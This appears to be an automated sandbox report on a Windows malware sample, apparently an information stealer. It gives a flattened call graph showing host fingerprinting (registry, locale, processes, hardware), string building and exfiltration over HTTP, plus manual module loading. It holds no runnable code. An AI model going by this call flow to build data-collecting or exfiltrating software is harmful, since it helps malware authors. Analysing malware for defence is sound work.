14889->14890 14891 63a740 lstrcpy 14890->14891 14892 6259ba 14891->14892 14893 63a740 lstrcpy 14892->14893 14894 6259c7 14893->14894 14895 63a740 lstrcpy 14894->14895 14896 6259d4 14895->14896 14897 63a740 lstrcpy 14896->14897 14898 6259e1 14897->14898 14899 63a740 lstrcpy 14898->14899 14900 6259ee InternetOpenA StrCmpCA 14899->14900 14901 625a1d 14900->14901 14902 625fc3 InternetCloseHandle 14901->14902 14904 638b60 3 API calls 14901->14904 14903 625fe0 14902->14903 14907 629ac0 4 API calls 14903->14907 14905 625a3c 14904->14905 14906 63a920 3 API calls 14905->14906 14908 625a4f 14906->14908 14909 625fe6 14907->14909 14910 63a8a0 lstrcpy 14908->14910 14911 63a820 2 API calls 14909->14911 14913 62601f ctype 14909->14913 14915 625a58 14910->14915 14912 625ffd 14911->14912 14914 63a9b0 4 API calls 14912->14914 14917 63a7a0 lstrcpy 14913->14917 14916 626013 14914->14916 14919 63a9b0 4 API calls 14915->14919 14918 63a8a0 lstrcpy 14916->14918 14927 62604f 14917->14927 14918->14913 14920 625a82 14919->14920 14921 63a8a0 lstrcpy 14920->14921 14922 625a8b 14921->14922 14923 63a9b0 4 API calls 14922->14923 14924 625aaa 14923->14924 14925 63a8a0 lstrcpy 14924->14925 14926 625ab3 14925->14926 14928 63a920 3 API calls 14926->14928 14927->13798 14929 625ad1 14928->14929 14930 63a8a0 lstrcpy 14929->14930 14931 625ada 14930->14931 14932 63a9b0 4 API calls 14931->14932 14933 625af9 14932->14933 14934 63a8a0 lstrcpy 14933->14934 14935 625b02 14934->14935 14936 63a9b0 4 API calls 14935->14936 14937 625b21 14936->14937 14938 63a8a0 lstrcpy 14937->14938 14939 625b2a 14938->14939 14940 63a9b0 4 API calls 14939->14940 14941 625b56 14940->14941 14942 63a920 3 API calls 14941->14942 14943 625b5d 14942->14943 14944 63a8a0 lstrcpy 14943->14944 14945 625b66 14944->14945 14946 625b7c InternetConnectA 14945->14946 14946->14902 14947 625bac HttpOpenRequestA 14946->14947 14949 625fb6 InternetCloseHandle 14947->14949 14950 625c0b 14947->14950 14949->14902 14951 63a9b0 4 API calls 14950->14951 14952 625c1f 14951->14952 14953 63a8a0 lstrcpy 14952->14953 14954 625c28 14953->14954 14955 63a920 3 API calls 14954->14955 14956 625c46 14955->14956 14957 63a8a0 lstrcpy 14956->14957 14958 625c4f 14957->14958 14959 63a9b0 4 API calls 14958->14959 14960 625c6e 14959->14960 14961 63a8a0 lstrcpy 14960->14961 14962 625c77 14961->14962 14963 63a9b0 4 API calls 14962->14963 14964 625c98 14963->14964 14965 63a8a0 lstrcpy 14964->14965 14966 625ca1 14965->14966 14967 63a9b0 4 API calls 14966->14967 14968 625cc1 14967->14968 14969 63a8a0 lstrcpy 14968->14969 14970 625cca 14969->14970 14971 63a9b0 4 API calls 14970->14971 14972 625ce9 14971->14972 14973 63a8a0 lstrcpy 14972->14973 14974 625cf2 14973->14974 14975 63a920 3 API calls 14974->14975 14976 625d10 14975->14976 14977 63a8a0 lstrcpy 14976->14977 14978 625d19 14977->14978 14979 63a9b0 4 API calls 14978->14979 14980 625d38 14979->14980 14981 63a8a0 lstrcpy 14980->14981 14982 625d41 14981->14982 14983 63a9b0 4 API calls 14982->14983 14984 625d60 14983->14984 14985 63a8a0 lstrcpy 14984->14985 14986 625d69 14985->14986 14987 63a920 3 API calls 14986->14987 14988 625d87 14987->14988 14989 63a8a0 lstrcpy 14988->14989 14990 625d90 14989->14990 14991 63a9b0 4 API calls 14990->14991 14992 625daf 14991->14992 14993 63a8a0 lstrcpy 14992->14993 14994 625db8 14993->14994 14995 63a9b0 4 API calls 14994->14995 14996 625dd9 14995->14996 14997 63a8a0 lstrcpy 14996->14997 14998 625de2 14997->14998 14999 63a9b0 4 API calls 14998->14999 15000 625e02 14999->15000 15001 63a8a0 lstrcpy 15000->15001 15002 625e0b 15001->15002 15003 63a9b0 4 API calls 15002->15003 15004 625e2a 15003->15004 15005 63a8a0 lstrcpy 15004->15005 15006 625e33 15005->15006 15007 63a920 3 API calls 15006->15007 15008 625e54 15007->15008 15009 63a8a0 lstrcpy 15008->15009 15010 625e5d 15009->15010 15011 625e70 lstrlen 15010->15011 15807 63aad0 15011->15807 15013 625e81 lstrlen GetProcessHeap RtlAllocateHeap 15808 63aad0 15013->15808 15015 625eae lstrlen 15016 625ebe 15015->15016 15017 625ed7 lstrlen 15016->15017 15018 625ee7 15017->15018 15019 625ef0 lstrlen 15018->15019 15020 625f04 15019->15020 15021 625f1a lstrlen 15020->15021 15809 63aad0 15021->15809 15023 625f2a HttpSendRequestA 15024 625f35 InternetReadFile 15023->15024 15025 625f6a InternetCloseHandle 15024->15025 15029 625f61 15024->15029 15025->14949 15027 63a9b0 4 API calls 15027->15029 15028 63a8a0 lstrcpy 15028->15029 15029->15024 15029->15025 15029->15027 15029->15028 15032 631077 15030->15032 15031 631151 15031->13800 15032->15031 15033 63a820 lstrlen lstrcpy 15032->15033 15033->15032 15035 630db7 15034->15035 15036 630f17 15035->15036 15037 630e27 StrCmpCA 15035->15037 15038 630e67 StrCmpCA 15035->15038 15039 630ea4 StrCmpCA 15035->15039 15040 63a820 lstrlen lstrcpy 15035->15040 15036->13808 15037->15035 15038->15035 15039->15035 15040->15035 15045 630f67 15041->15045 15042 631044 15042->13816 15043 63a820 lstrlen lstrcpy 15043->15045 15044 630fb2 StrCmpCA 15044->15045 15045->15042 15045->15043 15045->15044 15047 63a740 lstrcpy 15046->15047 15048 631a26 15047->15048 15049 63a9b0 4 API calls 15048->15049 15050 631a37 15049->15050 15051 63a8a0 lstrcpy 15050->15051 15052 631a40 15051->15052 15053 63a9b0 4 API calls 15052->15053 15054 631a5b 15053->15054 15055 63a8a0 lstrcpy 15054->15055 15056 631a64 15055->15056 15057 63a9b0 4 API calls 15056->15057 15058 631a7d 15057->15058 15059 63a8a0 lstrcpy 15058->15059 15060 631a86 15059->15060 15061 63a9b0 4 API calls 15060->15061 15062 631aa1 15061->15062 15063 63a8a0 lstrcpy 15062->15063 15064 631aaa 15063->15064 15065 63a9b0 4 API calls 15064->15065 15066 631ac3 15065->15066 15067 63a8a0 lstrcpy 15066->15067 15068 631acc 15067->15068 15069 63a9b0 4 API calls 15068->15069 15070 631ae7 15069->15070 15071 63a8a0 lstrcpy 15070->15071 15072 631af0 15071->15072 15073 63a9b0 4 API calls 15072->15073 15074 631b09 15073->15074 15075 63a8a0 lstrcpy 15074->15075 15076 631b12 15075->15076 15077 63a9b0 4 API calls 15076->15077 15078 631b2d 15077->15078 15079 63a8a0 lstrcpy 15078->15079 15080 631b36 15079->15080 15081 63a9b0 4 API calls 15080->15081 15082 631b4f 15081->15082 15083 63a8a0 lstrcpy 15082->15083 15084 631b58 15083->15084 15085 63a9b0 4 API calls 15084->15085 15086 631b76 15085->15086 15087 63a8a0 lstrcpy 15086->15087 15088 631b7f 15087->15088 15089 637500 6 API calls 15088->15089 15090 631b96 15089->15090 15091 63a920 3 API calls 15090->15091 15092 631ba9 15091->15092 15093 63a8a0 lstrcpy 15092->15093 15094 631bb2 15093->15094 15095 63a9b0 4 API calls 15094->15095 15096 631bdc 15095->15096 15097 63a8a0 lstrcpy 15096->15097 15098 631be5 15097->15098 15099 63a9b0 4 API calls 15098->15099 15100 631c05 15099->15100 15101 63a8a0 lstrcpy 15100->15101 15102 631c0e 15101->15102 15810 637690 GetProcessHeap RtlAllocateHeap 15102->15810 15105 63a9b0 4 API calls 15106 631c2e 15105->15106 15107 63a8a0 lstrcpy 15106->15107 15108 631c37 15107->15108 15109 63a9b0 4 API calls 15108->15109 15110 631c56 15109->15110 15111 63a8a0 lstrcpy 15110->15111 15112 631c5f 15111->15112 15113 63a9b0 4 API calls 15112->15113 15114 631c80 15113->15114 15115 63a8a0 lstrcpy 15114->15115 15116 631c89 15115->15116 15817 6377c0 GetCurrentProcess IsWow64Process 15116->15817 15119 63a9b0 4 API calls 15120 631ca9 15119->15120 15121 63a8a0 lstrcpy 15120->15121 15122 631cb2 15121->15122 15123 63a9b0 4 API calls 15122->15123 15124 631cd1 15123->15124 15125 63a8a0 lstrcpy 15124->15125 15126 631cda 15125->15126 15127 63a9b0 4 API calls 15126->15127 15128 631cfb 15127->15128 15129 63a8a0 lstrcpy 15128->15129 15130 631d04 15129->15130 15131 637850 3 API calls 15130->15131 15132 631d14 15131->15132 15133 63a9b0 4 API calls 15132->15133 15134 631d24 15133->15134 15135 63a8a0 lstrcpy 15134->15135 15136 631d2d 15135->15136 15137 63a9b0 4 API calls 15136->15137 15138 631d4c 15137->15138 15139 63a8a0 lstrcpy 15138->15139 15140 631d55 15139->15140 15141 63a9b0 4 API calls 15140->15141 15142 631d75 15141->15142 15143 63a8a0 lstrcpy 15142->15143 15144 631d7e 15143->15144 15145 6378e0 3 API calls 15144->15145 15146 631d8e 15145->15146 15147 63a9b0 4 API calls 15146->15147 15148 631d9e 15147->15148 15149 63a8a0 lstrcpy 15148->15149 15150 631da7 15149->15150 15151 63a9b0 4 API calls 15150->15151 15152 631dc6 15151->15152 15153 63a8a0 lstrcpy 15152->15153 15154 631dcf 15153->15154 15155 63a9b0 4 API calls 15154->15155 15156 631df0 15155->15156 15157 63a8a0 lstrcpy 15156->15157 15158 631df9 15157->15158 15819 637980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15158->15819 15161 63a9b0 4 API calls 15162 631e19 15161->15162 15163 63a8a0 lstrcpy 15162->15163 15164 631e22 15163->15164 15165 63a9b0 4 API calls 15164->15165 15166 631e41 15165->15166 15167 63a8a0 lstrcpy 15166->15167 15168 631e4a 15167->15168 15169 63a9b0 4 API calls 15168->15169 15170 631e6b 15169->15170 15171 63a8a0 lstrcpy 15170->15171 15172 631e74 15171->15172 15821 637a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15172->15821 15175 63a9b0 4 API calls 15176 631e94 15175->15176 15177 63a8a0 lstrcpy 15176->15177 15178 631e9d 15177->15178 15179 63a9b0 4 API calls 15178->15179 15180 631ebc 15179->15180 15181 63a8a0 lstrcpy 15180->15181 15182 631ec5 15181->15182 15183 63a9b0 4 API calls 15182->15183 15184 631ee5 15183->15184 15185 63a8a0 lstrcpy 15184->15185 15186 631eee 15185->15186 15824 637b00 GetUserDefaultLocaleName 15186->15824 15189 63a9b0 4 API calls 15190 631f0e 15189->15190 15191 63a8a0 lstrcpy 15190->15191 15192 631f17 15191->15192 15193 63a9b0 4 API calls 15192->15193 15194 631f36 15193->15194 15195 63a8a0 lstrcpy 15194->15195 15196 631f3f 15195->15196 15197 63a9b0 4 API calls 15196->15197 15198 631f60 15197->15198 15199 63a8a0 lstrcpy 15198->15199 15200 631f69 15199->15200 15828 637b90 15200->15828 15202 631f80 15203 63a920 3 API calls 15202->15203 15204 631f93 15203->15204 15205 63a8a0 lstrcpy 15204->15205 15206 631f9c 15205->15206 15207 63a9b0 4 API calls 15206->15207 15208 631fc6 15207->15208 15209 63a8a0 lstrcpy 15208->15209 15210 631fcf 15209->15210 15211 63a9b0 4 API calls 15210->15211 15212 631fef 15211->15212 15213 63a8a0 lstrcpy 15212->15213 15214 631ff8 15213->15214 15840 637d80 GetSystemPowerStatus 15214->15840 15217 63a9b0 4 API calls 15218 632018 15217->15218 15219 63a8a0 lstrcpy 15218->15219 15220 632021 15219->15220 15221 63a9b0 4 API calls 15220->15221 15222 632040 15221->15222 15223 63a8a0 lstrcpy 15222->15223 15224 632049 15223->15224 15225 63a9b0 4 API calls 15224->15225 15226 63206a 15225->15226 15227 63a8a0 lstrcpy 15226->15227 15228 632073 15227->15228 15229 63207e GetCurrentProcessId 15228->15229 15842 639470 OpenProcess 15229->15842 15232 63a920 3 API calls 15233 6320a4 15232->15233 15234 63a8a0 lstrcpy 15233->15234 15235 6320ad 15234->15235 15236 63a9b0 4 API calls 15235->15236 15237 6320d7 15236->15237 15238 63a8a0 lstrcpy 15237->15238 15239 6320e0 15238->15239 15240 63a9b0 4 API calls 15239->15240 15241 632100 15240->15241 15242 63a8a0 lstrcpy 15241->15242 15243 632109 15242->15243 15847 637e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15243->15847 15246 63a9b0 4 API calls 15247 632129 15246->15247 15248 63a8a0 lstrcpy 15247->15248 15249 632132 15248->15249 15250 63a9b0 4 API calls 15249->15250 15251 632151 15250->15251 15252 63a8a0 lstrcpy 15251->15252 15253 63215a 15252->15253 15254 63a9b0 4 API calls 15253->15254 15255 63217b 15254->15255 15256 63a8a0 lstrcpy 15255->15256 15257 632184 15256->15257 15851 637f60 15257->15851 15260 63a9b0 4 API calls 15261 6321a4 15260->15261 15262 63a8a0 lstrcpy 15261->15262 15263 6321ad 15262->15263 15264 63a9b0 4 API calls 15263->15264 15265 6321cc 15264->15265 15266 63a8a0 lstrcpy 15265->15266 15267 6321d5 15266->15267 15268 63a9b0 4 API calls 15267->15268 15269 6321f6 15268->15269 15270 63a8a0 lstrcpy 15269->15270 15271 6321ff 15270->15271 15864 637ed0 GetSystemInfo wsprintfA 15271->15864 15274 63a9b0 4 API calls 15275 63221f 15274->15275 15276 63a8a0 lstrcpy 15275->15276 15277 632228 15276->15277 15278 63a9b0 4 API calls 15277->15278 15279 632247 15278->15279 15280 63a8a0 lstrcpy 15279->15280 15281 632250 15280->15281 15282 63a9b0 4 API calls 15281->15282 15283 632270 15282->15283 15284 63a8a0 lstrcpy 15283->15284 15285 632279 15284->15285 15866 638100 GetProcessHeap RtlAllocateHeap 15285->15866 15288 63a9b0 4 API calls 15289 632299 15288->15289 15290 63a8a0 lstrcpy 15289->15290 15291 6322a2 15290->15291 15292 63a9b0 4 API calls 15291->15292 15293 6322c1 15292->15293 15294 63a8a0 lstrcpy 15293->15294 15295 6322ca 15294->15295 15296 63a9b0 4 API calls 15295->15296 15297 6322eb 15296->15297 15298 63a8a0 lstrcpy 15297->15298 15299 6322f4 15298->15299 15872 6387c0 15299->15872 15302 63a920 3 API calls 15303 63231e 15302->15303 15304 63a8a0 lstrcpy 15303->15304 15305 632327 15304->15305 15306 63a9b0 4 API calls 15305->15306 15307 632351 15306->15307 15308 63a8a0 lstrcpy 15307->15308 15309 63235a 15308->15309 15310 63a9b0 4 API calls 15309->15310 15311 63237a 15310->15311 15312 63a8a0 lstrcpy 15311->15312 15313 632383 15312->15313 15314 63a9b0 4 API calls 15313->15314 15315 6323a2 15314->15315 15316 63a8a0 lstrcpy 15315->15316 15317 6323ab 15316->15317 15877 6381f0 15317->15877 15319 6323c2 15320 63a920 3 API calls 15319->15320 15321 6323d5 15320->15321 15322 63a8a0 lstrcpy 15321->15322 15323 6323de 15322->15323 15324 63a9b0 4 API calls 15323->15324 15325 63240a 15324->15325 15326 63a8a0 lstrcpy 15325->15326 15327 632413 15326->15327 15328 63a9b0 4 API calls 15327->15328 15329 632432 15328->15329 15330 63a8a0 lstrcpy 15329->15330 15331 63243b 15330->15331 15332 63a9b0 4 API calls 15331->15332 15333 63245c 15332->15333 15334 63a8a0 lstrcpy 15333->15334 15335 632465 15334->15335 15336 63a9b0 4 API calls 15335->15336 15337 632484 15336->15337 15338 63a8a0 lstrcpy 15337->15338 15339 63248d 15338->15339 15340 63a9b0 4 API calls 15339->15340 15341 6324ae 15340->15341 15342 63a8a0 lstrcpy 15341->15342 15343 6324b7 15342->15343 15885 638320 15343->15885 15345 6324d3 15346 63a920 3 API calls 15345->15346 15347 6324e6 15346->15347 15348 63a8a0 lstrcpy 15347->15348 15349 6324ef 15348->15349 15350 63a9b0 4 API calls 15349->15350 15351 632519 15350->15351 15352 63a8a0 lstrcpy 15351->15352 15353 632522 15352->15353 15354 63a9b0 4 API calls 15353->15354 15355 632543 15354->15355 15356 63a8a0 lstrcpy 15355->15356 15357 63254c 15356->15357 15358 638320 17 API calls 15357->15358 15359 632568 15358->15359 15360 63a920 3 API calls 15359->15360 15361 63257b 15360->15361 15362 63a8a0 lstrcpy 15361->15362 15363 632584 15362->15363 15364 63a9b0 4 API calls 15363->15364 15365 6325ae 15364->15365 15366 63a8a0 lstrcpy 15365->15366 15367 6325b7 15366->15367 15368 63a9b0 4 API calls 15367->15368 15369 6325d6 15368->15369 15370 63a8a0 lstrcpy 15369->15370 15371 6325df 15370->15371 15372 63a9b0 4 API calls 15371->15372 15373 632600 15372->15373 15374 63a8a0 lstrcpy 15373->15374 15375 632609 15374->15375 15921 638680 15375->15921 15377 632620 15378 63a920 3 API calls 15377->15378 15379 632633 15378->15379 15380 63a8a0 lstrcpy 15379->15380 15381 63263c 15380->15381 15382 63265a lstrlen 15381->15382 15383 63266a 15382->15383 15384 63a740 lstrcpy 15383->15384 15385 63267c 15384->15385 15386 621590 lstrcpy 15385->15386 15387 63268d 15386->15387 15931 635190 15387->15931 15389 632699 15389->13820 16119 63aad0 15390->16119 15392 625009 InternetOpenUrlA 15396 625021 15392->15396 15393 6250a0 InternetCloseHandle InternetCloseHandle 15395 6250ec 15393->15395 15394 62502a InternetReadFile 15394->15396 15395->13824 15396->15393 15396->15394 16120 6298d0 15397->16120 15399 630759 15400 630a38 15399->15400 15401 63077d 15399->15401 15402 621590 lstrcpy 15400->15402 15403 630799 StrCmpCA 15401->15403 15404 630a49 15402->15404 15405 630843 15403->15405 15406 6307a8 15403->15406 16296 630250 15404->16296 15410 630865 StrCmpCA 15405->15410 15408 63a7a0 lstrcpy 15406->15408 15411 6307c3 15408->15411 15412 630874 15410->15412 15449 63096b 15410->15449 15413 621590 lstrcpy 15411->15413 15414 63a740 lstrcpy 15412->15414 15415 63080c 15413->15415 15417 630881 15414->15417 15418 63a7a0 lstrcpy 15415->15418 15416 63099c StrCmpCA 15419 6309ab 15416->15419 15438 630a2d 15416->15438 15420 63a9b0 4 API calls 15417->15420 15421 630823 15418->15421 15422 621590 lstrcpy 15419->15422 15423 6308ac 15420->15423 15424 63a7a0 lstrcpy 15421->15424 15425 6309f4 15422->15425 15426 63a920 3 API calls 15423->15426 15427 63083e 15424->15427 15428 63a7a0 lstrcpy 15425->15428 15429 6308b3 15426->15429 16123 62fb00 15427->16123 15431 630a0d 15428->15431 15432 63a9b0 4 API calls 15429->15432 15433 63a7a0 lstrcpy 15431->15433 15434 6308ba 15432->15434 15435 630a28 15433->15435 15438->13828 15449->15416 15771 63a7a0 lstrcpy 15770->15771 15772 621683 15771->15772 15773 63a7a0 lstrcpy 15772->15773 15774 621695 15773->15774 15775 63a7a0 lstrcpy 15774->15775 15776 6216a7 15775->15776 15777 63a7a0 lstrcpy 15776->15777 15778 6215a3 15777->15778 15778->14651 15780 6247c6 15779->15780 15781 624838 lstrlen 15780->15781 15805 63aad0 15781->15805 15783 624848 InternetCrackUrlA 15784 624867 15783->15784 15784->14728 15786 624eee 15785->15786 15787 629af9 LocalAlloc 15785->15787 15786->14750 15786->14753 15787->15786 15788 629b14 CryptStringToBinaryA 15787->15788 15788->15786 15789 629b39 LocalFree 15788->15789 15789->15786 15791 63a740 lstrcpy 15790->15791 15792 638b74 15791->15792 15793 63a740 lstrcpy 15792->15793 15794 638b82 GetSystemTime 15793->15794 15796 638b99 15794->15796 15795 63a7a0 lstrcpy 15797 638bfc 15795->15797 15796->15795 15797->14744 15799 63a931 15798->15799 15800 63a988 15799->15800 15802 63a968 lstrcpy lstrcat 15799->15802 15801 63a7a0 lstrcpy 15800->15801 15803 63a994 15801->15803 15802->15800 15803->14747 15804->14862 15805->15783 15806->14872 15807->15013 15808->15015 15809->15023 15938 6377a0 15810->15938 15813 6376c6 RegOpenKeyExA 15815 6376e7 RegQueryValueExA 15813->15815 15816 637704 RegCloseKey 15813->15816 15814 631c1e 15814->15105 15815->15816 15816->15814 15818 631c99 15817->15818 15818->15119 15820 631e09 15819->15820 15820->15161 15822 631e84 15821->15822 15823 637a9a wsprintfA 15821->15823 15822->15175 15823->15822 15825 637b4d 15824->15825 15827 631efe 15824->15827 15945 638d20 LocalAlloc CharToOemW 15825->15945 15827->15189 15829 63a740 lstrcpy 15828->15829 15830 637bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15829->15830 15839 637c25 15830->15839 15831 637c46 GetLocaleInfoA 15831->15839 15832 637d18 15833 637d28 15832->15833 15834 637d1e LocalFree 15832->15834 15835 63a7a0 lstrcpy 15833->15835 15834->15833 15838 637d37 15835->15838 15836 63a9b0 lstrcpy lstrlen lstrcpy lstrcat 15836->15839 15837 63a8a0 lstrcpy 15837->15839 15838->15202 15839->15831 15839->15832 15839->15836 15839->15837 15841 632008 15840->15841 15841->15217 15843 639493 GetModuleFileNameExA CloseHandle 15842->15843 15844 6394b5 15842->15844 15843->15844 15845 63a740 lstrcpy 15844->15845 15846 632091 15845->15846 15846->15232 15848 632119 15847->15848 15849 637e68 RegQueryValueExA 15847->15849 15848->15246 15850 637e8e RegCloseKey 15849->15850 15850->15848 15852 637fb9 GetLogicalProcessorInformationEx 15851->15852 15853 637fd8 GetLastError 15852->15853 15854 638029 15852->15854 15861 638022 15853->15861 15863 637fe3 15853->15863 15857 6389f0 2 API calls 15854->15857 15860 63807b 15857->15860 15858 6389f0 2 API calls 15859 632194 15858->15859 15859->15260 15860->15861 15862 638084 wsprintfA 15860->15862 15861->15858 15861->15859 15862->15859 15863->15852 15863->15859 15946 6389f0 15863->15946 15949 638a10 GetProcessHeap RtlAllocateHeap 15863->15949 15865 63220f 15864->15865 15865->15274 15867 6389b0 15866->15867 15868 63814d GlobalMemoryStatusEx 15867->15868 15869 638163 __aulldiv 15868->15869 15870 63819b wsprintfA 15869->15870 15871 632289 15870->15871 15871->15288 15873 6387fb GetProcessHeap RtlAllocateHeap wsprintfA 15872->15873 15875 63a740 lstrcpy 15873->15875 15876 63230b 15875->15876 15876->15302 15878 63a740 lstrcpy 15877->15878 15880 638229 15878->15880 15879 638263 15881 63a7a0 lstrcpy 15879->15881 15880->15879 15883 63a9b0 lstrcpy lstrlen lstrcpy lstrcat 15880->15883 15884 63a8a0 lstrcpy 15880->15884 15882 6382dc 15881->15882 15882->15319 15883->15880 15884->15880 15886 63a740 lstrcpy 15885->15886 15887 63835c RegOpenKeyExA 15886->15887 15888 6383d0 15887->15888 15889 6383ae 15887->15889 15891 638613 RegCloseKey 15888->15891 15892 6383f8 RegEnumKeyExA 15888->15892 15890 63a7a0 lstrcpy 15889->15890 15902 6383bd 15890->15902 15895 63a7a0 lstrcpy 15891->15895 15893 63843f wsprintfA RegOpenKeyExA 15892->15893 15894 63860e 15892->15894 15896 6384c1 RegQueryValueExA 15893->15896 15897 638485 RegCloseKey RegCloseKey 15893->15897 15894->15891 15895->15902 15898 638601 RegCloseKey 15896->15898 15899 6384fa lstrlen 15896->15899 15900 63a7a0 lstrcpy 15897->15900 15898->15894 15899->15898 15901 638510 15899->15901 15900->15902 15903 63a9b0 4 API calls 15901->15903 15902->15345 15904 638527 15903->15904 15905 63a8a0 lstrcpy 15904->15905 15906 638533 15905->15906 15907 63a9b0 4 API calls 15906->15907 15908 638557 15907->15908 15909 63a8a0 lstrcpy 15908->15909 15910 638563 15909->15910 15911 63856e RegQueryValueExA 15910->15911 15911->15898 15912 6385a3 15911->15912 15913 63a9b0 4 API calls 15912->15913 15914 6385ba 15913->15914 15915 63a8a0 lstrcpy 15914->15915 15916 6385c6 15915->15916 15917 63a9b0 4 API calls 15916->15917 15918 6385ea 15917->15918 15919 63a8a0 lstrcpy 15918->15919 15920 6385f6 15919->15920 15920->15898 15922 63a740 lstrcpy 15921->15922 15923 6386bc CreateToolhelp32Snapshot Process32First 15922->15923 15924 6386e8 Process32Next 15923->15924 15925 63875d CloseHandle 15923->15925 15924->15925 15930 6386fd 15924->15930 15926 63a7a0 lstrcpy 15925->15926 15928 638776 15926->15928 15927 63a8a0 lstrcpy 15927->15930 15928->15377 15929 63a9b0 lstrcpy lstrlen lstrcpy lstrcat 15929->15930 15930->15924 15930->15927 15930->15929 15932 63a7a0 lstrcpy 15931->15932 15933 6351b5 15932->15933 15934 621590 lstrcpy 15933->15934 15935 6351c6 15934->15935 15950 625100 15935->15950 15937 6351cf 15937->15389 15941 637720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15938->15941 15940 6376b9 15940->15813 15940->15814 15942 637780 RegCloseKey 15941->15942 15943 637765 RegQueryValueExA 15941->15943 15944 637793 15942->15944 15943->15942 15944->15940 15945->15827 15947 6389f9 GetProcessHeap HeapFree 15946->15947 15948 638a0c 15946->15948 15947->15948 15948->15863 15949->15863 15951 63a7a0 lstrcpy 15950->15951 15952 625119 15951->15952 15953 6247b0 2 API calls 15952->15953 15954 625125 15953->15954 16110 638ea0 15954->16110 15956 625184 15957 625192 lstrlen 15956->15957 15958 6251a5 15957->15958 15959 638ea0 4 API calls 15958->15959 15960 6251b6 15959->15960 15961 63a740 lstrcpy 15960->15961 15962 6251c9 15961->15962 15963 63a740 lstrcpy 15962->15963 15964 6251d6 15963->15964 15965 63a740 lstrcpy 15964->15965 15966 6251e3 15965->15966 15967 63a740 lstrcpy 15966->15967 15968 6251f0 15967->15968 15969 63a740 lstrcpy 15968->15969 15970 6251fd InternetOpenA StrCmpCA 15969->15970 15971 62522f 15970->15971 15972 6258c4 InternetCloseHandle 15971->15972 15973 638b60 3 API calls 15971->15973 15979 6258d9 ctype 15972->15979 15974 62524e 15973->15974 15975 63a920 3 API calls 15974->15975 15976 625261 15975->15976 15977 63a8a0 lstrcpy 15976->15977 15978 62526a 15977->15978 15980 63a9b0 4 API calls 15978->15980 15983 63a7a0 lstrcpy 15979->15983 15981 6252ab 15980->15981 15982 63a920 3 API calls 15981->15982 15984 6252b2 15982->15984 15991 625913 15983->15991 15985 63a9b0 4 API calls 15984->15985 15986 6252b9 15985->15986 15987 63a8a0 lstrcpy 15986->15987 15988 6252c2 15987->15988 15989 63a9b0 4 API calls 15988->15989 15990 625303 15989->15990 15992 63a920 3 API calls 15990->15992 15991->15937 15993 62530a 15992->15993 15994 63a8a0 lstrcpy 15993->15994 15995 625313 15994->15995 15996 625329 InternetConnectA 15995->15996 15996->15972 15997 625359 HttpOpenRequestA 15996->15997 15999 6258b7 InternetCloseHandle 15997->15999 16000 6253b7 15997->16000 15999->15972 16001 63a9b0 4 API calls 16000->16001 16002 6253cb 16001->16002 16003 63a8a0 lstrcpy 16002->16003 16004 6253d4 16003->16004 16005 63a920 3 API calls 16004->16005 16006 6253f2 16005->16006 16007 63a8a0 lstrcpy 16006->16007 16008 6253fb 16007->16008 16009 63a9b0 4 API calls 16008->16009 16010 62541a 16009->16010 16011 63a8a0 lstrcpy 16010->16011 16012 625423 16011->16012 16013 63a9b0 4 API calls 16012->16013 16014 625444 16013->16014 16015 63a8a0 lstrcpy 16014->16015 16016 62544d 16015->16016 16017 63a9b0 4 API calls 16016->16017 16018 62546e 16017->16018 16019 63a8a0 lstrcpy 16018->16019 16111 638ead CryptBinaryToStringA 16110->16111 16112 638ea9 16110->16112 16111->16112 16113 638ece GetProcessHeap RtlAllocateHeap 16111->16113 16112->15956 16113->16112 16114 638ef4 ctype 16113->16114 16115 638f05 CryptBinaryToStringA 16114->16115 16115->16112 16119->15392 16362 629880 16120->16362 16122 6298e1 16122->15399 16124 63a740 lstrcpy 16123->16124 16297 63a740 lstrcpy 16296->16297 16298 630266 16297->16298 16299 638de0 2 API calls 16298->16299 16300 63027b 16299->16300 16301 63a920 3 API calls 16300->16301 16302 63028b 16301->16302 16303 63a8a0 lstrcpy 16302->16303 16304 630294 16303->16304 16305 63a9b0 4 API calls 16304->16305 16306 6302b8 16305->16306 16363 62988e 16362->16363 16366 626fb0 16363->16366 16365 6298ad ctype 16365->16122 16369 626d40 16366->16369 16370 626d63 16369->16370 16371 626d59 16369->16371 16385 626530 16370->16385 16371->16365 16375 626dbe 16375->16371 16395 6269b0 16375->16395 16377 626e2a 16377->16371 16378 626ee6 VirtualFree 16377->16378 16379 626ef7 16377->16379 16378->16379 16380 626f26 FreeLibrary 16379->16380 16381 626f38 16379->16381 16384 626f41 16379->16384 16380->16379 16383 6389f0 2 API calls 16381->16383 16382 6389f0 2 API calls 16382->16371 16383->16384 16384->16371 16384->16382 16386 626542 16385->16386 16388 626549 16386->16388 16405 638a10 GetProcessHeap RtlAllocateHeap 16386->16405 16388->16371 16389 626660 16388->16389 16392 62668f VirtualAlloc 16389->16392 16391 626730 16393 626743 VirtualAlloc 16391->16393 16394 62673c 16391->16394 16392->16391 16392->16394 16393->16394 16394->16375 16396 6269c9 16395->16396 16400 6269d5 16395->16400 16397 626a09 LoadLibraryA 16396->16397 16396->16400 16398 626a32 16397->16398 16397->16400 16402 626ae0 16398->16402 16406 638a10 GetProcessHeap RtlAllocateHeap 16398->16406 16400->16377 16401 626ba8 GetProcAddress 16401->16400 16401->16402 16402->16400 16402->16401 16403 6389f0 2 API calls 16403->16402 16404 626a8b 16404->16400 16404->16403 16405->16388 16406->16404

                  Executed Functions

                  Function 00639860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 639860-639874 call 639750 663 639a93-639af2 LoadLibraryA * 5 660->663 664 63987a-639a8e call 639780 GetProcAddress * 21 660->664 666 639af4-639b08 GetProcAddress 663->666 667 639b0d-639b14 663->667 664->663 666->667 668 639b46-639b4d 667->668 669 639b16-639b41 GetProcAddress * 2 667->669 671 639b68-639b6f 668->671 672 639b4f-639b63 GetProcAddress 668->672 669->668 673 639b71-639b84 GetProcAddress 671->673 674 639b89-639b90 671->674 672->671 673->674 675 639b92-639bbc GetProcAddress * 2 674->675 676 639bc1-639bc2 674->676 675->676
                  APIs
                  • GetProcAddress.KERNEL32(75900000,01310EA0), ref: 006398A1
